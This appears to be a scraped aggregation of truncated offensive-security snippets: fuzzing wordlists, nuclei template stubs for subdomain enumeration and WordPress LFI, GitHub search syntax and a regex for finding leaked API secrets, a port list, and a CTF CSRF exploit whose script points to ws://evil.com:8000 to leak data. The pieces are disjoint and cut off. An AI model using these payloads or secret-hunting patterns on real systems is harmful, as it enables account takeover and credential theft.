ph5i

%00
%01
%02
%03
%04
%05
%06
%07
%08
%09

DhiyaneshGeek

id: securitytrails-subdomain

info:
  name: SecurityTrail Subdomain Enum
  author: DhiyaneshDK,vinothkumar
  severity: unknown

self-contained: true
http:
  - raw:

win3zz

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

nullenc0de

import os

def find_best_wordlists(user_word, max_wordlists):
    wordlists_dir = '/opt/OneListForAll/dict'
    wordlists = os.listdir(wordlists_dir)

    matched_wordlists = []

    for wordlist in wordlists:
        if user_word.lower() in wordlist.lower():

h4x0r-dz

(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

0x240x23elu

id: wordpress-LFI

info:
  name: wordpress-LFI
  author: 0x240x23elu
  severity: High

requests:
  - method: GET
    path:

sidxparab

21
22
25
80
110
135
143
261
271
324

jhaddix

`
~/
~
ים
   
 
___
__
_

cgvwzq

<body>
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
    // change admin's email
    <input type="text" name="email" value="wololo@coolmail.com">
    <input type="text" name="csrf" value="">
    <input type="text" name="change" value="Modify profile">
</form>
<iframe id="leakchar"></iframe>
<script>
const WS = "ws://evil.com:8000";

jhaddix

.
..
........
@
*
*.*
*.*.*
🐎